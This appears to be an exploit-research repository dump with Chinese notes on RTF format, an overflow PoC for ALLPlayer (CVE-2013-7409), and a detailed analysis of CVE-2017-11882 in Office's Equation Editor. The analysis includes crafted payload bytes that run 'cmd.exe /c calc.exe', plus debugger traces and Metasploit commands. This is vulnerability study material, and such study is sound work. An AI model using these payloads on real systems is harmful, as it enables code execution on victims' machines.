19 | 20 | ![](./1.png) 21 | 22 | ## 补充:RTF文件格式 23 | 24 | RTF是一种在不同操作系统下不同应用软件之间进行文本和图象信息交换的文件格式。以RTF格式作为多媒体系统中文本媒体的一种输入形式,可为用户提供极大的方便。 25 | 26 | 简要分析了RTF文件格式 27 | 28 | ### RTF基本语法 29 | 30 | RTF文件由未格式化本文、控制字、控制符和组组成。RTF文件没有限制文件的行的最大长度。控制字是RTF用来标记打印控制符和管理文档信息的一种特殊格式的命令。一个控制字最长32个字符。控制字的使用格式如下: 31 | 32 | \字母序列<分隔符> 33 | 34 | 注意:每个控制字均以一个反斜杠\开头。字母序列由a~z 的小写字母组成。控制字(或者称为关键字)通常应该不包含任何大写字母。 35 | 36 | 分隔符标记RTF控制字的结束, 可以是下列各项之一: 37 | 38 | · 一个空格,这时空格是控制字的一部份。 39 | 40 | · 一个数字或连字符(-), 表示跟随的一个数值参数。该数字序列的长度由其后的一个空格或除了字母和数字 41 | 的其他字符划定。这个参数可以是正数或者负数,它的取值范围通常是从-32767到32767。 42 | 43 | · 任何非字母和数字的其他字符。这种情况下,此分隔字符结束控制字,而它并不属于控制字的一部分。 44 | 控制符由一个反斜线\跟随单个非字母字符组成。例如,\~代表一个不换行空格。控制符不需要分隔符。 45 | 46 | 组由包括在({})中的文本、控制字或控制符组成。左扩符({)表示组的开始,右扩符(})表示组的结束。每个组包括文本和文本的不同属性。RTF文件也能同时包括字体、格式、屏幕颜色、图形、脚注、注释(注解)、文件头和文件尾、摘要信息、域和书签的组合,以及文档、区段、段落和字符的格式属性。如果包括字体、文件、格式、屏幕颜色、校订标记,以及摘要信息组、文档格式属性,则他们一定要在文件的第一纯文本字符之前,这些组形成RTF的文件头。如果包括字体组,则它应该在格式组之前。如果组未使用,可以省略。 47 | 48 | 对于RTF文件的详细语法及关键字说明请参阅《Rich Text Format (RTF) Specification v1.7》,这里不作更详细的说明。 49 | 50 | ### Hello Word 51 | 52 | 一个Hello Word!演示例子,内容如下: 53 | 54 | {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052 55 | {\fonttbl{\f0\fmodern\fprq6\fcharset134 \'cb\'ce\'cc\'e5;}} 56 | {\*\generator Msftedit 5.41.21.2500;}\viewkind4\uc1\pard\lang2052\f0\fs20 Hello World!\par} 57 | 58 | 该文件分析如下: 59 | 60 | 1、文件基本属性: 61 | {\rtf1 RTF版本\ansi字符集\ansicpg936简体中文\deff0默认字体0\deflang1033美国英语\deflangfe2052中国汉语 62 | 2、字体表: 63 | {\fonttbl{\f0字体0\fmodern\fprq6字体间距为6\fcharset134GB2312国标码 \'cb\'ce\'cc\'e5宋体;}} 64 | 3、生成器信息: 65 | {\*\generator Msftedit 5.41.21.2500;} 66 | 4、文档属性: 67 | \viewkind4正常视图\uc1单字节\pard默认段落属性\lang2052中国汉语\f0字体0\fs20字体大小20磅 68 | 5、正文文本: 69 | Hello World!\par段落标记 70 | }文件结束 71 | 72 | 73 | ## 参考链接 74 | 75 | http://interglacial.com/rtf/ 76 | 77 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/unMSO.DLL: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2010-3333/unMSO.DLL -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2013-7409/poc.py: -------------------------------------------------------------------------------- 1 | junk = "http://" 2 | 3 | buffer="\x41" * 5000 4 | 5 | exploit = junk + buffer 6 | 7 | try: 8 | out_file = open("ALLPlayer_Poc.m3u",'w') 9 | out_file.write(exploit) 10 | out_file.close() 11 | print "Exploit file created!" 12 | except: 13 | print "Error" -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/DATA: -------------------------------------------------------------------------------- 1 | ---- EQNOLEFILEHDR ---- 2 | 3 | 1C 00 -> cbHdr 4 | 00 00 02 00 -> version 5 | 9E C4 -> cf 6 | A9 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该exp为0xA9(169),即下面的加亮部分 7 | 00 00 00 00 -> reserved1 8 | C8 A7 5C 00 -> reserved2 9 | C4 EE 5B 00 -> reserved3 10 | 00 00 00 00 -> reserved4 11 | 12 | ---- MTEFData ---- 13 | ---- MTEF header (version 2 and later) ---- 14 | 15 | 03 -> MTEF version 16 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 17 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 18 | 03 -> product version 19 | 0A -> product subversion 20 | 21 | ---- MTEF Byte Stream ---- 22 | 23 | 0A -> record SIZE 24 | 01 -> 25 | 08 -> FONT 26 | 5A -> typeface number 27 | 5A -> style 28 | 29 | ---- font name (null-terminated) ---- 30 | 63 6D 64 2E 65 78 65 20 2F 63 20 63 61 6C 63 2E 31 | 65 78 65 20 41 41 41 41 41 41 41 41 41 41 41 41 32 | 41 41 41 41 41 41 41 41 41 41 41 41 12 0C 43 00 33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 | 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | ---- EQNOLEFILEHDR ---- 49 | 50 | 1C 00 -> cbHdr 51 | 00 00 02 00 -> version 52 | FF C1 -> cf 53 | 24 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该正常rtf为0x24(36),即下面的加亮部分 54 | 00 00 00 00 -> reserved1 55 | 00 00 00 00 -> reserved2 56 | 1C DA 31 00 -> reserved3 57 | 00 00 00 00 -> reserved4 58 | 59 | ---- MTEFData ---- 60 | ---- MTEF header (version 2 and later) ---- 61 | 62 | 03 -> MTEF version 63 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 64 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 65 | 03 -> product version 66 | 0A -> product subversion 67 | 68 | ---- MTEF Byte Stream ---- 69 | 70 | 0A -> record SIZE 71 | 72 | 01 03 01 00 00 01 02 88 36 00 02 88 36 00 02 88 73 | 36 00 00 02 96 28 00 02 96 29 00 00 00 00 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | data = '' 85 | for i in range(0xFF): 86 | data += hex(i)[2:].zfill(2) 87 | print data 88 | 89 | 0102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebf 90 | 91 | c0c1c2c3c4c5c6c7c8c9cacbcccdcecf 92 | 93 | d0d1d2d3d4d5d6d7d8 d9dadbdc dddedf 94 | 95 | e0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe 96 | 97 | 98 | 99 | ChildEBP RetAddr Args to Child 100 | WARNING: Stack unwind information not available. Following frames may be wrong. 
101 | 0012f228 302f2e2d 20333231 00000000 0012f248 EqnEdt32!FltToolbarWinProc+0x22d0 102 | 0012f26c 004218e4 0012f3ac 0012f5dc 0012f7dc 0x302f2e2d 103 | 0012f35c 004214e2 0012f3ac 00120000 00000001 EqnEdt32!FMDFontListEnum+0x650 104 | 0012f388 0043b466 0012f3ac 00120000 0012f5dc EqnEdt32!FMDFontListEnum+0x24e 105 | 0012f4b0 0043a8a0 0012f5dc 0012f7dc 00000006 EqnEdt32!MFEnumFunc+0xcc69 106 | 0012f4c8 0043a72f 00000008 0012f5dc 0012f7dc EqnEdt32!MFEnumFunc+0xc0a3 107 | 0012f4e0 004375da 00000008 0012f534 0012f5dc EqnEdt32!MFEnumFunc+0xbf32 108 | 0012f544 0042f926 0012f55c 0012f5dc 0012f7dc EqnEdt32!MFEnumFunc+0x8ddd 109 | 0012f574 00406a98 0035007c 0012f5dc 0012f7dc EqnEdt32!MFEnumFunc+0x1129 110 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\RPCRT4.dll - 111 | 0012f5d8 76e502ca 00285a98 02905f90 00000202 EqnEdt32!AboutMathType+0x5a98 112 | 0012f5f4 76eb6311 00406881 0012f7e0 00000002 RPCRT4!NdrServerInitialize+0x3a1 113 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ole32.dll - 114 | 0012f9fc 773fe7e6 00275c80 00272730 002a8b80 RPCRT4!NdrStubCall2+0x23d 115 | 0012fa44 773fe876 00275c80 002a8b80 00272730 ole32!WdtpInterfacePointer_UserUnmarshal+0x256f 116 | 0012fa8c 773fedd0 002a8b80 00283b90 00285de0 ole32!WdtpInterfacePointer_UserUnmarshal+0x25ff 117 | 0012fad8 77318a13 002a8b80 002864c8 00275c80 ole32!WdtpInterfacePointer_UserUnmarshal+0x2b59 118 | 0012fbb4 77318908 00272730 00000000 00275c80 ole32!CoTaskMemFree+0x1b12 119 | 120 | 121 | first crash 0044C437 122 | 123 | second crash 002f2e2d ?? ??? 124 | 125 | 112f2e2d ?? ??? 
126 | 127 | 128 | 0:000> uf 430c12 129 | EqnEdt32!MFEnumFunc+0x2415: 130 | 00430c12 ff151c684600 call dword ptr [EqnEdt32!FltToolbarWinProc+0x1c6b5 (0046681c)] 131 | 132 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/carsh1.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/carsh1.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/carsh2.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/carsh2.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/carsh3.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/carsh3.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/File/exploit-calc.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/File/exploit-calc.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/EQNOLEFILEHDR.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/EQNOLEFILEHDR.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Equation-Native.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Equation-Native.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/FONT-record.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/FONT-record.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-Load.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-Load.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage-interface.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/IPersistStorage.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/MTEF-Byte-Stream.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/MTEF-Byte-Stream.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/MTEF-header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/MTEF-header.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/ReadMTEFData.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/ReadMTEFData.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Tag-byte-structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Tag-byte-structure.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Test-rtf-Equation-Native.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Test-rtf-Equation-Native.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/Test-rtf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/Test-rtf.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/exploit-rtf-Equation-Native.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/exploit-rtf-Equation-Native.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/functions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/functions.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/interface.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/oleinit.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/oleinit.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/ret.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/ret.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/Images/stackoverflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/Images/stackoverflow.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/OleFileView.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/OleFileView.zip -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.exe -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.idb: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2017-11882/eqnedt322007-kb4011604-fullfile-x86-ar-sa.idb -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/exploit.md: -------------------------------------------------------------------------------- 1 | # 漏洞原理分析 2 | 3 | 调试环境: windows7_sp1_x86 + office 2007 x86 + windbg 6.12 x86 4 | 5 | EQNEDT32.EXE version: 2000.11.9.0 6 | 7 | 该漏洞位于实现OLE接口的IPersistStorage::Load函数中。sub_40415B为ole的初始化过程,如下图1所示,它调用了sub_40440A函数,sub_40440A的主要作用是在初始化EQNEDT32.EXE实现的COM接口的各个函数指针。 8 | 9 | ![](./Images/oleinit.png) 10 | 11 | (图一) 12 | 13 | 通过工具我们可以看到EQNEDT32.EXE实现了如下接口(图2):(工具为OleViewDotNet) 14 | 15 | ![](./Images/interface.png) 16 | 17 | (图二) 18 | 19 | 我们可以在EQNEDT32.EXE文件里面看到对这些接口的比较和使用,如图3所示: 20 | 21 | ![](./Images/IPersistStorage.png) 22 | 23 | (图三) 24 | 25 | 我们重点关注IPersistStorage接口,任何ole对象必须实现该接口,图4为微软对该接口的说明: 26 | 27 | ![](./Images/IPersistStorage-interface.png) 28 | 29 | (图四) 30 | 31 | 我们可以看到IPersistStorage接口的各个方法指针在 sub_40440A中被初始化,如图5所示: 32 | 33 | ![](./Images/IPersistStorage-Load.png) 34 | 35 | (图五) 36 | 37 | 图5中圈出的IPersistStorage::Load方法的主要用途是用来读入ole数据,在EQNEDT32.EXE中实现该方法后,即可被调用以读入MathType对应的ole数据,我们来看一下这个Load函数内部是怎么实现的,我们可以看到该函数的核心逻辑是打开并读入一个叫做“Equation Native”的流的数据(图6-1),在此基础上进一步读入MathType数据(图6-2): 38 | 39 | ![](./Images/Equation-Native.png) 40 | 41 | (图6.1) 42 | 43 | ![](./Images/ReadMTEFData.png) 44 | 45 | (图6.2) 46 | 47 | 我们来看一下这个“Equation Native”流来自哪里(图7),通过分析ole文件,我们可以看到该流的数据由用户所提供,正常情况下,流里面的数据代表一个MathType的公式,而恶意攻击者构造的数据可以如图7所示: 48 | 49 | ![](./Images/exploit-rtf-Equation-Native.png) 50 | 51 | (图7) 52 | 53 | 漏洞的直接触发原因为:在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出,如图8所示。从图9可以看出,函数给v12变量分配的大小是0x24个字节,超过该大小就会造成溢出,从而覆盖不远处的eip,达到劫持程序执行流的目的,从v12开始算起,eip的位置为+0x2c,即44,再往前覆盖就是调用参数。 54 | 55 | ![](./Images/stackoverflow.png) 56 | 57 | (图8) 58 | 59 | 
![](./Images/ret.png) 60 | 61 | (图9) 62 | 63 | 整个漏洞执行过程的步骤如图10所示 64 | 65 | ![](./Images/functions.png) 66 | 67 | (图10) 68 | 69 | 在构造exp寻找偏移时,在strstr函数中发生了一次不可利用的crash.原因是strstr函数中引用我们控制的内容所指向的内存(如下代码片段)。所以需要在构造时设置'\x00'截断 70 | 71 | v2 = *(_BYTE *)buffer; 72 | 73 | 74 | 75 | # 从零开始构造exp 76 | 77 | 完全按照[银雁冰](https://www.anquanke.com/post/id/87311)大牛的文章进行.最终弹出了calc.exe 78 | 79 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/knowledge.md: -------------------------------------------------------------------------------- 1 | # 一些知识 2 | ## poi 3 | 4 | 如果一个地址为0×00123456的指针, 指向地址0×00420000 5 | 那么下面两条指令是等价的: 6 | 7 | 0:000> dd 420000 8 | 0:000> dd poi(123456) 9 | 10 | ## dds dqs dps 11 | dds、dps和dqs命令显示给定范围内存的内容,它们是把内存区域转储出来,并把内存中每个元素都视为一个符号对其进行解析,dds是四字节视为一个符号,dqs是每8字节视为一个符号,dps是根据当前处理器架构来选择最合适的长度 12 | 13 | ## 数据对象和数据源 (OLE) 14 | 15 | 使用剪贴板或拖放时,可以将执行的数据传输,因此,数据源有一个和一个目标。 一个应用程序对复制的数据,而另一应用程序接受它粘贴的。 转发需要的每端对相同数据的不同操作但为了向前成功。 Microsoft 基础类 (MFC)库提供表示此转发的每端的两类: 16 | 17 | 实现的数据源 (由 COleDataSource 对象表示) 传输数据的源端。 这些按源应用程序创建数据,则将复制到剪贴板时,或者在拖放操作的数据时提供。 18 | 19 | 实现的数据对象 (由 COleDataObject 对象表示) 数据传输的目标边。 它们创建时,目的应用的数据删除到该时,或者当请求运行从剪贴板中粘贴操作。 20 | 21 | ## 工具 22 | 23 | 利用oletools中的rtfobj将rtf中的ole数据dump出来 24 | 再利用OleFileView查看关键结构及其内容 25 | 26 | ## IPersistStorage 27 | 28 | IPersistStorage:使容器应用程序能够将存储对象传递给其包含的对象之一,并加载和保存存储对象。 29 | 30 | ## msfconsole 31 | 32 | $ search CVE-2017-11882 33 | $ use exploit/windows/fileformat/office_ms17_11882 34 | $ info 35 | 36 | 37 | ## Equation Native数据结构 38 | 39 | 结构体来源: 40 | 41 | http://rtf2latex2e.sourceforge.net/MTEF3.html#header_v2+ 42 | http://web.archive.org/web/20010304111449/http://mathtype.com:80/support/tech/MTEF_storage.htm 43 | 44 | Equation Native = EQNOLEFILEHDR + MTEFData 45 | 其中 MTEFData = MTEF header + MTEF Byte Stream 46 | 47 | EQNOLEFILEHDR的结构如下(图1): 48 | 49 | 50 | ![](./Images/EQNOLEFILEHDR.png) 51 | 52 | (图1) 53 | 54 | 55 | MTEF header的结构如下(图2),实际发现通过office 
2007插入的公式其product subversion字段恒定为0x0A,这与下图有所出入: 56 | 57 | 58 | ![](./Images/MTEF-header.png) 59 | 60 | (图2) 61 | 62 | 63 | MTEF Byte Stream的结构如下(图3),可以看到它由一个SIZE record及后续的一些record构成,各种record的类别如图(图4)所示,其中对于本次漏洞相关的Font record的说明如图(图5)所示。 64 | 65 | 66 | ![](./Images/MTEF-Byte-Stream.png) 67 | 68 | (图3) 69 | 70 | 71 | 72 | ![](./Images/Tag-byte-structure.png) 73 | 74 | (图4) 75 | 76 | 77 | 78 | ![](./Images/FONT-record.png) 79 | 80 | (图5) 81 | 82 | 83 | ## exploit.rtf中的Equation Native数据 84 | 85 | 86 | ![](./Images/exploit-rtf-Equation-Native.png) 87 | 88 | **(图6)** 89 | 90 | 91 | ---- EQNOLEFILEHDR ---- 92 | 93 | 1C 00-> cbHdr 94 | 00 00 02 00 -> version 95 | 9E C4 -> cf 96 | A9 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该exp为0xA9(169),即下面从MTEF header开始的直到结束的部分 97 | 00 00 00 00 -> reserved1 98 | C8 A7 5C 00 -> reserved2 99 | C4 EE 5B 00 -> reserved3 100 | 00 00 00 00 -> reserved4 101 | 102 | ---- MTEFData ---- 103 | ---- MTEF header (version 2 and later) ---- 104 | 105 | 03 -> MTEF version 106 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 107 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 108 | 03 -> product version 109 | 0A -> product subversion 110 | 111 | ---- MTEF Byte Stream ---- 112 | 113 | 0A -> record SIZE 114 | 01 -> 115 | 08 -> FONT 116 | 5A -> typeface number 117 | 5A -> style 118 | 119 | ---- font name (null-terminated) ---- 120 | 63 6D 64 2E 65 78 65 20 2F 63 20 63 61 6C 63 2E 121 | 65 78 65 20 41 41 41 41 41 41 41 41 41 41 41 41 122 | 41 41 41 41 41 41 41 41 41 41 41 41 12 0C 43 00 123 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 124 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 125 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 126 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 127 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 128 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 129 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 130 | 131 | ## 正常rtf中的Equation Native数据 132 | 133 | ![](./Images/Test-rtf.png) 
134 | 135 | **(图7)** 136 | 137 | 138 | 139 | ![](./Images/Test-rtf-Equation-Native.png) 140 | 141 | **(图8)** 142 | 143 | 144 | ---- EQNOLEFILEHDR ---- 145 | 146 | 1C 00-> cbHdr 147 | 00 00 02 00 -> version 148 | FF C1 -> cf 149 | 24 00 00 00 -> cbObject,MTEF数据长度,按字节计算,该正常rtf为0x24(36),即下面从MTEF header开始的直到结束的部分 150 | 00 00 00 00 -> reserved1 151 | 00 00 00 00 -> reserved2 152 | 1C DA 31 00 -> reserved3 153 | 00 00 00 00 -> reserved4 154 | 155 | ---- MTEFData ---- 156 | ---- MTEF header (version 2 and later) ---- 157 | 158 | 03 -> MTEF version 159 | 01 -> generating platform (0 for Macintosh, 1 for Windows) 160 | 01 -> generating product (0 for MathType, 1 for Equation Editor) 161 | 03 -> product version 162 | 0A -> product subversion 163 | 164 | ---- MTEF Byte Stream ---- 165 | 166 | 0A -> record SIZE 167 | 168 | 01 03 01 00 00 01 02 88 36 00 02 88 36 00 02 88 169 | 36 00 00 02 96 28 00 02 96 29 00 00 00 00 170 | 171 | 通过上面的观察我们已经发现,所有插入的Equation Native数据在截止到SIZE record的数据排布都是一致的,不同之处在于恶意的Equation Native在SIZE record后放了一个Font record,其数据构成为: 172 | 173 | Font record = tag(固定为8,占一个字节) + typeface(占一个字节) + style(占一个字节) + font_name(以0x00结尾的字符串) 174 | 175 | 观察发现typeface和style这两个字节比较随意(分析多个poc里面这两个字节并不相同),实际构造时,我把两个字节改成其他的一些值(例如全为0)并不影响漏洞的触发。 176 | 177 | ## 对Equation Native数据的具体解析 178 | 179 | Eqnedt32在如下位置读入font tag. 
180 | 181 | int __cdecl sub_43755C(int a1) 182 | { 183 | int result; // eax@1 184 | int v2; // eax@5 185 | int v3; // ST48_4@6 186 | int v4; // ST34_4@20 187 | int v5; // ST28_4@41 188 | int v6; // [sp+18h] [bp-3Ch]@24 189 | int v7; // [sp+18h] [bp-3Ch]@37 190 | int v8; // [sp+1Ch] [bp-38h]@25 191 | int i; // [sp+24h] [bp-30h]@17 192 | int v10; // [sp+2Ch] [bp-28h]@9 193 | int v11; // [sp+30h] [bp-24h]@6 194 | int v12; // [sp+38h] [bp-1Ch]@0 195 | __int16 v13; // [sp+3Ch] [bp-18h]@5 196 | int v14; // [sp+40h] [bp-14h]@9 197 | int v15; // [sp+40h] [bp-14h]@32 198 | __int16 v16; // [sp+44h] [bp-10h]@5 199 | int v17; // [sp+4Ch] [bp-8h]@8 200 | int v18; // [sp+50h] [bp-4h]@1 201 | 202 | v18 = *(_DWORD *)(dword_45B380 + 4); 203 | sub_426ADE(); 204 | result = a1; 205 | if ( *(_DWORD *)(a1 + 8) ) 206 | { 207 | sub_420E60(); 208 | sub_420E72(1); 209 | if ( sub_43A988(a1, v18) ) 210 | { 211 | if ( !*(_DWORD *)(v18 + 46) ) 212 | sub_4318E1(v18); 213 | LOWORD(v2) = (unsigned __int8)inc_and_get_byte_from_counter_offset();// Read font tag(8) 214 | v13 = sub_43A720(v2, &v16); 215 | 216 | 随后将tag传入sub_43A720函数,并进一步传入其子函数sub_43A87A进行判断,如下所示: 217 | 218 | __int16 __cdecl sub_43A87A(__int16 a1) 219 | { 220 | while ( 1 ) 221 | { 222 | if ( (a1 & 0xF) == 8 ) ------> 此处堆font 数据进行处理 223 | { 224 | sub_43B418(); 225 | goto LABEL_5; 226 | } 227 | if ( (a1 & 0xF) < 9 ) 228 | return a1; 229 | sub_43B1D0(a1, &word_45B246, &word_45B244); 230 | LABEL_5: 231 | a1 = (unsigned __int8)inc_and_get_byte_from_counter_offset(); 232 | } 233 | } 234 | 235 | 在sub_43B418函数中,首先读取font record中代表typeface和style的两个字节,如下所示: 236 | 237 | int sub_43B418() 238 | { 239 | __int16 v0; // ST18_2@1 240 | int result; // eax@1 241 | char v2; // [sp+14h] [bp-104h]@1 242 | 243 | v0 = (unsigned __int8)inc_and_get_byte_from_counter_offset(); ---> typeface 244 | inc_and_get_byte_from_counter_offset(); ----> style 245 | sub_4164FA(&v2); 246 | result = sub_4214C6(&v2); 247 | word_45ABE6[v0] = result; 248 | return result; 249 | } 
